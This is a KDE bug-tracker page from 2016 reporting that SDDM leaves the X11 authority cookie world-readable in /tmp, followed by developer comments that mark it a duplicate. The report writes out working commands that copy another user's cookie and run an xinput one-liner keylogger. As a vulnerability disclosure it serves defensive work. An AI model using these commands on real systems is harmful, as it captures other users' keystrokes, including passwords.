Bug 363140 - World-readable X11 Cookie, easy key logger
Summary: World-readable X11 Cookie, easy key logger
Status: RESOLVED DUPLICATE of bug 358593
Alias: None
Product: kde
Classification: I don't know
Component: general (show other bugs)
Version: unspecified
Platform: Arch Linux Linux
: NOR normal
Target Milestone: ---
Assignee: Unassigned bugs mailing-list
Depends on:
Reported: 2016-05-16 15:55 UTC by David Rumley
Modified: 2016-06-22 11:10 UTC (History)
6 users (show)

See Also:
Latest Commit:
Version Fixed In:


Note You need to log in before you can comment on or make changes to this bug.
Description David Rumley 2016-05-16 15:55:02 UTC
After logging in as any user, you are able to get the X11 cookie and start a key logger. This has been tested on a F23 system with KDE / SDDM (with current patches) and a Arch Linux system with KDE / SDDM (plasma-desktop 5.6.4-1). 

You are able to easily get the X11 cookie.
$ sha256sum .Xauthority
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8  .Xauthority

$ sha256sum /tmp/xauth-1000-_0

The cookie is world-readable, even if you change the permissions to the cookie, after a reboot the changes are gone.
$ ls -l /tmp/xauth-1000-_0
-rw-r--r--. 1 sm sm 60 24. Feb 14:04 /tmp/xauth-1000-_0

I have another user that I log via the text console, after that you just need to start the typical X11 keylogger.
$ cp /tmp/xauth-1000-_0 .Xauthority
$ export DISPLAY=:0
$ xinput list |  grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |  xargs -P0 -n1 xinput test

Reproducible: Always

Steps to Reproduce:
1. Login via the text console on any user.
2. Copy the X11 cookie over to .Xauthority file for the user you just logged into.
$ cp /tmp/xauth-1000-_0 .Xauthority
3. Start the typical X11 keylogger.
$ xinput list |  grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |  xargs -P0 -n1 xinput test

Actual Results:  
After running the commands listed in "Steps to Reproduce" section, all the keyboard pushes are printed to the text console.

Expected Results:  
The X11 cookie should not be world-readable.
Comment 1 Frederik Schwarzer 2016-05-16 20:59:32 UTC
www.kde.org might be the wrong Product, no?
Not sure where it would belong to, though. Maybe frameworks-kinit?
Comment 2 David Rumley 2016-05-16 21:15:32 UTC
I'm not sure, I thought it belonged here. If not I can always move it.
Comment 3 Albert Astals Cid 2016-05-16 21:41:51 UTC
I'd say this is a bug in sddm.

Abusing the CC here to add Pier Luigi and Martin for confirmation.
Comment 4 Ben Cooksley 2016-05-17 09:29:20 UTC
Moving to a generic component to get this off the kde-www mailing list.
Comment 5 Christoph Feck 2016-05-17 12:00:59 UTC
Bug 329616 indicates that the xauth file might not be created by the display manager.
Comment 6 Christoph Feck 2016-05-17 12:16:16 UTC

*** This bug has been marked as a duplicate of bug 358593 ***
Comment 7 Albert Astals Cid 2016-05-17 21:04:58 UTC
That bug is only for the tmp file for not for  .Xauthority ?
Comment 8 Pier Luigi Fiorini 2016-05-17 21:21:34 UTC
sddm creates ~/.Xauthority with xauth, but you are talking of another file here.
this indeed might be a duplicate of 358593 as it sounds a lot like the file referenced there.
Comment 9 Albert Astals Cid 2016-05-17 21:33:43 UTC
Right i read the code of sddm too quickly and thought it was using a QFile to create the .XAuthority file.

*** This bug has been marked as a duplicate of bug 358593 ***
Comment 10 Pier Luigi Fiorini 2016-05-17 21:50:21 UTC
sddm should set the XAUTHORITY env var, you might consider changing kdeinit to use that instead